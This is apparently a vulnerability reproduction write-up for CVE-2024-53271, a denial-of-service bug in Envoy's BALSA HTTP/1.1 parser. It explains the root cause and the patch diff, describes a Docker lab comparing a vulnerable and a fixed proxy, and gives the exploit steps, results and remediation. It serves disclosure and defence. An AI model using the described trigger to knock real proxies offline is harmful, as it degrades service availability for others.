CVE-2024-53271 — Envoy BALSA Parser Double-MessageDone() DoS¶
Published 2026-06-06
Summary
A logic error in Envoy's HTTP/1.1 BALSA parser causes MessageDone() to be called twice for the same stream when the upstream sends a non-101 1xx intermediate response. This corrupts connection state and causes a significant fraction of downstream requests to fail with stream-reset errors, producing an unauthenticated, remotely-triggered availability impact.
| Field | Value |
|---|---|
| Project | Envoy Proxy |
| Affected component | source/common/http/http1/balsa_parser.cc — BalsaParser::MessageDone() |
| Severity | HIGH |
| CVSS | AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:H (v3.1, score 7.1) |
| CWE | CWE-670 |
| Affected versions | 1.31.0 – 1.31.4, 1.32.0 – 1.32.2 |
| Fixed version | 1.31.5, 1.32.3 |
| Advisory | GHSA-rmm5-h2wv-mg4f |
1. Vulnerability Overview¶
Envoy Proxy is a high-performance edge and service proxy written in C++. Since roughly version 1.26, Envoy has used the BALSA HTTP/1.1 parser by default. CVE-2024-53271 is a control-flow defect in BALSA that an attacker can trigger by arranging for an upstream HTTP/1.1 server to send a non-101 1xx intermediate response (e.g. 102 Processing) before the final response. When the runtime feature flag envoy.reloadable_features.http1_balsa_delay_reset is enabled (the default in all affected versions), the bug causes MessageDone() to fire twice on the same stream, corrupting Envoy's per-stream parser state. A large fraction of downstream client requests then terminate abnormally with stream-reset or connection errors: roughly 65% in typical conditions, and 96–100% at high concurrency in the reproduction.
Root cause. In source/common/http/http1/balsa_parser.cc, the BalsaParser::MessageDone() function is supposed to finalize a single HTTP message by calling connection_->onMessageComplete(). For 1xx responses, which have no body, the BALSA parser progresses through HeaderDone() directly to MessageDone(). This first invocation resets first_byte_processed_ to false. When the final response (e.g. 200 OK) subsequently arrives, MessageDone() is called a second time. The guard at the top of the function checked only for ParserStatus::Error and therefore allowed both invocations to call onMessageComplete(), corrupting connection and stream state.
The patch makes MessageDone() idempotent by adding an early-return condition:
// BEFORE
void BalsaParser::MessageDone() {
- if (status_ == ParserStatus::Error) {
+ if (status_ == ParserStatus::Error ||
+ // In the case of early 1xx, MessageDone() can be called twice in a row.
+ // The !first_byte_processed_ check is to make this function idempotent.
+ (wait_for_first_byte_before_msg_done_ && !first_byte_processed_)) {
return;
}
status_ = convertResult(connection_->onMessageComplete());
The patch also introduces a new runtime guard, envoy.reloadable_features.wait_for_first_byte_before_balsa_msg_done. When enabled (the new default in fixed versions), the second MessageDone() invocation for a 1xx-then-final exchange returns early because first_byte_processed_ is false after the first invocation, skipping the damaging second call to onMessageComplete().
2. Vulnerable Environment¶
The reproduction runs entirely in Docker using Envoy's official prebuilt images; no source build is required. Four containers share a single bridge network (cve-2024-53271-net):
| Container | Role | Image | Host port |
|---|---|---|---|
cve-2024-53271-envoy-vuln |
Vulnerable proxy | envoyproxy/envoy:v1.32.2 |
127.0.0.1:10000 (downstream), 127.0.0.1:9900 (admin) |
cve-2024-53271-envoy-baseline |
Fixed baseline proxy | envoyproxy/envoy:v1.32.3 |
127.0.0.1:10001 (downstream), 127.0.0.1:9901 (admin) |
cve-2024-53271-upstream-102 |
Triggering upstream | custom (cve-2024-53271-upstream:local) |
internal only |
cve-2024-53271-upstream-plain |
Liveness upstream (no 1xx) | custom (cve-2024-53271-upstream:local) |
internal only |
Each proxy exposes two routes on its single :10000 listener:
GET|HEAD /trigger: routes toupstream-102, which responds with a raw102 Processingframe followed by200 OK. This is the path that fires the bug on the vulnerable proxy.GET|HEAD /plain: routes toupstream-plain, which responds with200 OKonly (no 1xx). This path serves as a liveness check to confirm the proxy is healthy independently of the bug.
The vulnerable proxy (envoy-vuln) is configured in env/config/envoy-vuln.yaml with the two triggering runtime flags explicitly set:
layered_runtime:
layers:
- name: static_layer
static_layer:
envoy.reloadable_features.http1_balsa_delay_reset: true
envoy.reloadable_features.wait_for_first_byte_before_balsa_msg_done: false
The baseline proxy (envoy-baseline) runs envoyproxy/envoy:v1.32.3 and has both flags set in the opposite direction (http1_balsa_delay_reset: false, wait_for_first_byte_before_balsa_msg_done: true). Its listener, route, and cluster configuration is otherwise byte-identical to the vulnerable proxy, which is what makes the differential meaningful.
The environment files are available as env.zip. Individual files: env/Dockerfile, env/docker-compose.yml, env/config/envoy-vuln.yaml, env/config/envoy-baseline.yaml, env/config/upstream.py.
To stand up the environment:
Confirm the stack is healthy before running the exploit (all four responses must be 200):
docker compose -f env/docker-compose.yml ps
curl -s -o /dev/null -w "vuln admin: %{http_code}\n" http://127.0.0.1:9900/ready
curl -s -o /dev/null -w "baseline admin: %{http_code}\n" http://127.0.0.1:9901/ready
curl -s -o /dev/null -w "vuln /plain: %{http_code}\n" http://127.0.0.1:10000/plain
curl -s -o /dev/null -w "baseline /plain: %{http_code}\n" http://127.0.0.1:10001/plain
Verify the exact image versions:
docker exec cve-2024-53271-envoy-vuln envoy --version # .../1.32.2/...
docker exec cve-2024-53271-envoy-baseline envoy --version # .../1.32.3/...
3. How to Exploit¶
The exploit is a differential probe: it sends concurrent HTTP/1.1 requests to both the vulnerable and fixed proxy over the /trigger path (which routes to the 102-responding upstream) and measures what fraction of requests reach clean end-of-stream. No special privilege is required; any unauthenticated downstream client will suffice.
The exploit scripts are available as exploit.zip. Individual files: exploit/run.sh, exploit/probe.py.
Step 1. Confirm the environment is up and healthy (four 200s, as shown in §2 above).
Step 2. Run the exploit script:
The arguments are: vulnerable proxy host, vulnerable proxy port, baseline proxy host, baseline proxy port, trigger path, liveness path, probe count (50 requests per configuration per path), and concurrency (20 in-flight probes at a time). The script runs a liveness pre-check on both proxies via /plain, then fires 50 concurrent /trigger probes at each proxy, reads the raw downstream HTTP/1.1 bytes, classifies each response as clean or abnormal, and prints a per-configuration clean-completion rate. It also reads Envoy's own admin stats at :9900 and :9901 as independent corroboration.
What proves it worked. The evidence that the bug fired comes from two independent observations, neither of which is the exploit's own stdout claim.
First, the exploit script classifies each probe by reading raw downstream wire bytes and checking whether the response is a well-formed HTTP message with a valid final status line. On the vulnerable proxy, the corrupted parser emits framing that the script reports as bad-status-line: b'0' or empty-response (stream reset / decoder reset): garbled bytes produced by Envoy after MessageDone() runs twice. This is observed from the perspective of the downstream client, not authored by the exploit.
Second, Envoy's own admin stats endpoint (/stats) tracks http.ingress_http.downstream_rq_completed and downstream_rq_total independently of any client. After the reproduction runs, these counters confirm the failure:
VULN: http.ingress_http.downstream_rq_completed: 51 / downstream_rq_total: 101
BASELINE: http.ingress_http.downstream_rq_completed: 101 / downstream_rq_total: 101
On the vulnerable proxy, only 51 of 101 requests (the 50 liveness /plain probes plus one completion from the /trigger batch) reached clean completion according to Envoy's own internal counter; the remaining 50 /trigger probes never completed. On the fixed proxy, completed equals total.
The observed output from two successive runs:
# Run 1
RESULT VULN-LIVENESS: clean=50 failed=0 total=50 clean_rate=100.0%
RESULT BASELINE-LIVENESS: clean=50 failed=0 total=50 clean_rate=100.0%
RESULT VULN-TRIGGER: clean=0 failed=50 total=50 clean_rate=0.0% (all "bad-status-line: b'0'")
RESULT BASELINE-TRIGGER: clean=50 failed=0 total=50 clean_rate=100.0%
# Run 2 (reproducibility)
RESULT VULN-LIVENESS: clean=50 failed=0 total=50 clean_rate=100.0%
RESULT BASELINE-LIVENESS: clean=50 failed=0 total=50 clean_rate=100.0%
RESULT VULN-TRIGGER: clean=2 failed=48 total=50 clean_rate=4.0%
RESULT BASELINE-TRIGGER: clean=50 failed=0 total=50 clean_rate=100.0%
The liveness path (/plain, no 1xx upstream) completes cleanly at 100% on both proxies in every run, confirming the proxy infrastructure is healthy and the failure is specific to the 1xx-then-final trigger. The /trigger path on the fixed proxy also completes at 100%, establishing that the same upstream sequence is handled correctly by the patched build. Only the vulnerable build with the triggering flags set collapses to 0–4% clean completion, attributing the failure to the CVE rather than to any environment artifact.
Teardown. When finished, stop and remove all containers and volumes:
4. Security Advice¶
Remediation. Upgrade to Envoy 1.31.5 or 1.32.3. These releases introduce the envoy.reloadable_features.wait_for_first_byte_before_balsa_msg_done runtime guard (enabled by default) that makes MessageDone() idempotent, preventing the second invocation from calling onMessageComplete() again for a stream that already completed its 1xx phase.
Workaround. If an immediate upgrade is not possible, set the runtime feature envoy.reloadable_features.http1_balsa_delay_reset to false in the layered runtime configuration. This disables the delayed-reset behavior that is the prerequisite for the double MessageDone() invocation. This flag may have functional trade-offs; consult the release notes and the advisory before deploying the workaround in production.
Scope. The bug only affects HTTP/1.1 traffic handled by the BALSA parser (the default since ~1.26) on paths where the upstream can send a non-101 1xx response. HTTP/2 and HTTP/3 connections are not affected. The CVSS UI:R component reflects that an attacker needs to arrange a 1xx-emitting upstream; in a service-mesh context, a compromised or attacker-controlled upstream service provides that capability.
References.
- NVD — CVE-2024-53271 — CWE, CVSS, affected and fixed versions, publication date.
- GHSA-rmm5-h2wv-mg4f (GitHub Security Advisory) — Full advisory, mitigation guidance, credits.
- Patch commit da56f6da — envoyproxy/envoy — Authoritative diff:
balsa_parser.ccidempotency guard, new runtime feature flag, integration tests. - BUseclab/cve-genie — exploit.py — Concurrent HEAD request PoC script.
- livecvebench/CVE-Factory — solution.sh + entrypoint.sh — Full reproduction environment reference.